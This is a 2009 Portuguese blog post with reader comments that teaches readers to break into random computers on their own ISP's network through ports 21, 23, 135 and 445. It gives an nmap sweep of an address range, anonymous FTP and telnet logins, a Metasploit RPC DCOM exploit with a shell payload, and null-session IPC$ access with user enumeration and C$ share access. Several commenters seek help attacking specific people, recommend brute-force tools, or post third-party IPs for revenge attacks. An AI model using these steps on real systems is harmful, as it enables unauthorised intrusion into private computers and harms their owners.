Invasao pelas portas 21,23,135,445

Publicado: maio 12, 2009 em ataques, exploits, metasploit, seguranca
Tags:,

Estou fazendo esse tutorial aqui, porque me pediram para postar aqui. Mais eu odeio esse tipo de ataque, pois esse tipo de ataque não satisfaz as nossas necessidades. UMA PERGUNTA: porque pessoas gostam de ficar invadindo computadores aleatoriamente sem saber donde é aquele computador, sem saber de nada?

Eu mesmo respondo. Essas pessoas que fazem isso são lammers que saem tentando invadir tudo quanter sistema para si gabar para seus amigos. AIAAIAIAI

Um conselho para todos vocês que sabem invadir ou estão aprendendo: VOCE NÃO PRECISA FALAR PARA NINGUEM QUE VOCE SABE INVADIR, POIS QUANDO SURGIR A NECESSIDADE, VOCE SURPREENDERÁ OUTRAS PESSOAS!

Um tutorial bem simples e obsoleto que é ainda muito usado nos dias de hoje (por lammers).

Invasão pelas portas:

21: FTP

23: TELNET

135: RPC

445: COMPARTILHAMENTO

Estes ataques precisam ter pessoas do mesmo provedor que você.

Vamos começar:

Pegue o seu ip externo(sugestão: www.meuip.com.br).

Baixe o nmap e instale no seu pc.

Vamos supor que o seu ip seja: 201.33.22.18.

Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.

Prosseguindo…

Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.

digite:

nmap -sV -T Insane -A -v  201.33.22.1-254 -p21,23,135,44

Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.

Código:

Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164

Invasao pela porta 21

vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.

Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a

Invasao pela porta 23

Iniciar>Executar>cmd>telnet>open>201.33.22  23

Invasao pela porta 135

CASO a porta 135 aberta, podemos usar o METASPLOIT

abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.

depois disso escolha o tipo de conexao como: GERENIC\SHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.

depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
Invasao pela porta 445

Esta porta é de compartilhamento.

Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:””

Comando concluído com êxito.
baixa o Dumpusers

ponha ele no C:\
abra o cmd digite;

dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
depois você vai no:

iniciar>executar>\\201.45.241.175\c$

Gente esse tipo de invasão é uma das mais ridículas. Aconcelho a nao fazerem isso.

Fonte: invasão.com.br

 

 

comentários
  1. marcio421 disse:

    onde eu baixo o nmap maan ?

  2. juancarloscunha disse:

    Mano, voce pode baixar o nmap, neste site…
    http://nmap.org/download.html

    ou voce pode baixar no site do superdownload no link…

    http://superdownloads.uol.com.br/download/109/nmap/

  3. william disse:

    concordo co sua teoria Eu mesmo respondo. Essas pessoas que fazem isso são lammers que saem tentando invadir tudo quanter sistema para si gabar para seus amigos. AIAAIAIAI

    Um conselho para todos vocês que sabem invadir ou estão aprendendo: VOCE NÃO PRECISA FALAR PARA NINGUEM QUE VOCE SABE INVADIR, POIS QUANDO SURGIR A NECESSIDADE, VOCE SURPREENDERÁ OUTRAS PESSOAS!

    bem legau msm

  4. sils nunes disse:

    bom eu achei que esse texto de muito foi meu
    agrado obrigado ao autor deste magnifico texto

  5. Lucas César. disse:

    Para se tornar um “HACKER” voçê não tem que aprender teorias poucas, Quer um conselho ?
    Estude, HTML, XHTM , LINGUAGEM DE PROGRAMAÇÃO C e C++ Assembly. Estude sobre textos;
    java script, Estude sobre CMD. SOBRE PROGRAMAS SOBRE TCP/IP e outros.
    Quando souber tudo isso, ai sim voçê será um HACKER

    • louis disse:

      Gostei das dicas,se temos tempo devemos estudar tudo ,assim sempre estaremos na frente daqueles que se gabam saber demais .

    • lol disse:

      vc sera gay

    • renan disse:

      teoria nao basta, tem que saber afundo programacao,redes,banco de dados,hardware, o mais importante, voce nao pode ter preguisa de ler se nao esqueça essa nao e sua praia, hacker estuda muita coisa, ate coisas alem da informatica. pesquise alguns hacker famosos pela net, adrian lamo,albert gonzales,Kevin Mitnick.
      Um dos maiore hacker do mundo ‘http://pt.wikipedia.org/wiki/Kevin_Mitnick’ .

  6. Ticalacatica disse:

    legal Gostei Esse Do Net user eu não sabia =D Vlw mais tipo fica facil de invadir quando Você Conheçe o infeliz =D ai fica very easy

  7. renan disse:

    Olha por favor eu ja cheguei no maximo que o google pode ensinar ja fui em exploit, net cat, trojan, scanners etc,, faz 4 anos que estou todo santo dia aprendendo coisas novas e eu queria que alguem por favor me passasse um site bom mesmo de conhecimento eu to até começando programar xD
    eu quero saber so por segurança se alguem poder me ajudar me add:
    renancv2007@hotmail.com

  8. brunim disse:

    Mais e se eu quisesse invadir o computador de uma pessoa especifica sem ser aleatoriamente como vc falou no post :
    “Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.”
    isso pode ser qualquer um.

    • Cara, si voce quiser invadir uma maquina esperifica.
      Basta voce fazer um scanneamento de portas abertas e o nome das falhas cujas as portas estao abertas e procurar um exploit para a exploracao da falha encontrada.
      Porem, isso as vezes necessita de tempo.

  9. wagner disse:

    Ótimo post! Explica bastante a respeito de portas abertas e vulnerabilidades.

    É possível um scaner apartir de uma rede escanear outra(s)? Se puder respomder-me agradeço.

    Um abraço e muito sucesso!

  10. tankyo disse:

    Hoje Dia 3 de setembro de 210

    Puta merda tava procurando outra coisa e cai nesse sity …
    parabens pelo post mas .. isso ai nao existe ….
    se auguem conseguir com esses comandos … eu pago 500 reais só ligar pra mim ….

    quer ser hacker?????

  11. antonio disse:

    pow bom cosigo entra no ip da vitima mas pede nome do usuario senha
    alguem pode mim ajudar obrigado….

  12. Anderson Rocha disse:

    Se isso é invasão, eu devia desinstalar meu firewall!!
    Fala sério!

  13. Queria saber como quebrar as senhas de um servidor ftp, alguem sabe?

  14. Matheus disse:

    Aew tu pode usar o Hydra se for Windows ou o Medusa se for o Linux eles sao bom mais usam o metodo de Brute force…

  15. mateus disse:

    sim eu consegui invadir um site mais ele tem um coisa como e que eu posso editar as coisas

  16. edurado colto disse:

    gostaria da ajuda pra invadir esse pc 189.18.223.44 portas abertas.. 5357, 12000,49152, 49153, 49154, 49155, 49156, 49157, o cara fica tentando invadir meu pc todo dia..

    • Marcus Vinicius disse:

      rastreia ele e martela o PC dele todinho 😄

    • Abel LulzSec disse:

      89.18.223.111 [ dsl.telesp.net.br ]
      System: Linux
      Router model: ZWA-G220
      Portas Abertas [ 6 ]
      25 [ SMTP ]
      80 [ Http ]
      110 [ Pop3 ]
      22 [ Ssh ]
      8080 [ Htp-Proxy ]
      3128 [ Proxy/Socjs ]

      Eduardo —>>> Porta 22[ Ssh ] = Usado para Acesso Remoto

      Ma passa seu IP Externo que eu verifico se ele realmente estava tentando invadir se PC e se caso for positivo se o cabaço instalou algum Cavalo de Tróia, pode me mandar por mensagem no meu Facebook.

    • Abel LulzSec disse:

      89.18.223.111 [ dsl.telesp.net.br ]
      System: Linux
      Router model: ZWA-G220
      Portas Abertas [ 6 ]
      25 [ SMTP ]
      80 [ Http ]
      110 [ Pop3 ]
      22 [ Ssh ]
      8080 [ Htp-Proxy ]
      3128 [ Proxy/Socjs ]

      Eduardo —>>> Porta 22[ Ssh ] = Usado para Acesso Remoto

      Ma passa seu IP Externo que eu verifico se ele realmente estava tentando invadir se PC e se caso for positivo se o cabaço instalou algum Cavalo de Tróia, pode me mandar por mensagem no meu Facebook.

  17. justino disse:

    gostei muinto dessas explicaçoes, leio bastante soubre tudo, estou comessando a aprender,
    quero aprender para o bem , e nao para fazer mal a outras pessoas , mais nao acho ser muinto facil, e bastante complicado, devagar chego la, se Deus quizer. um abraço a todos e muinto obrigado.

  18. 00lupos00 disse:

    no caso do telnet ele pede login e senha oq eu faço ?
    já tentei
    Senha: Admin
    Login: Admin
    —————-Senha: gvt12345
    —————-login:admin
    mas nada acontece

  19. Iniciante disse:

    Tudo bem amigo,

    Estava pesquisando como invadir o Windows server 2008 pela porta 445 e achei interessante seu tutorial, poderia me ajudar, pois sou iniciante e estudante da àrea de Redes e procuro explorar essa vulnerabilidade para fazer um teste e documenta-lo, porém houve um erro observe na mensagem:
    C:\>dumpusers -target xxxxx -type notdc -start 2 -stop 9 -mode verbose

    DumpUsers 1.1 – (c) 2002-2006, Arne Vidstrom
    http://ntsecurity.nu/toolbox/dumpusers

    Error: Access denied

    Além disso, eu não entendi o que ocorre detalhadamente com esses comandos executados, se puder me dar umas dicas e outras formas simples de ataques na porta 445 vai ajudar pra cas ^^..

    Obrigado.

    Atenciosamente.

  20. Lucas Calebe Rodrigues Costa disse:

    por que não é aconselhável usar esse tipo de invasão

  21. duzentoseuros disse:

    Me contate pro email: duzentoseuros1@hotmail.com

  22. Sônia disse:

    Oi! Há dias meu antivírus ficava avisando que estavam tentando criar um novo usuário. Mesmo sem entender o motivo pelo qual ele emitia esse aviso, eu sempre negava.
    Só que meu computador começou a ter comportamento estranho, desligando sozinho do nada, abrindo páginas no navegador… coisas assim. Viajando pela net encontrei tutoriais pra eliminar malware, trojans, etc e fiz tudinho.
    Mas hj, achei estranho quando entrei no meu e-mail e lá estava uma mensagem enviada de mim pra mim mesma, com um áudio em mp3. Detalhe: é claro q não fui eu que enviei, sou doida mas nem tanto…kkkkkk.
    Então, o próprio provedor aviso sobre atividade estranha em minha conta eme deu opção de analisar minhas últimas atividades.
    E lá estava a prova da invasão.Alguém dos EUA entrou no meu e-mail!!! Rastreei o IP dele e vi que é de Los Angeles.
    Então, colegas, aqui vai o IP pra qq um de vocês que puder se vingar por mim…hehehe. Que o feitiço vire contra o feiticeiro! hahahahaha
    Endereço IP do invasor: 70.39.184.137

    • carlos disse:

      Provavelmente este IP é de proxy externo. Ou seja. Para descobrir realmente quem é esta pessoa, da muito trabAlho.
      mas, pagando bem que mal tem?😀

  23. hackersemalma disse:

    Só tem Zé Cú Aqui…Invadem Porra Nenhuma…

  24. refenixx disse:

    Como eu posso provar que invadiram meu computador, tem algumj lugar que eu veja isso. Uma gde empresa invadiu, na falta de backup, e preciso provar para a policia. Me ajude por favor

  25. Lucas disse:

    Olá, sobre a porta 135, você diz: “abra o metasploit na interface web”…
    mas como é isso? Eu tenho que baixar alguma coisa? Como que faço isso?

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s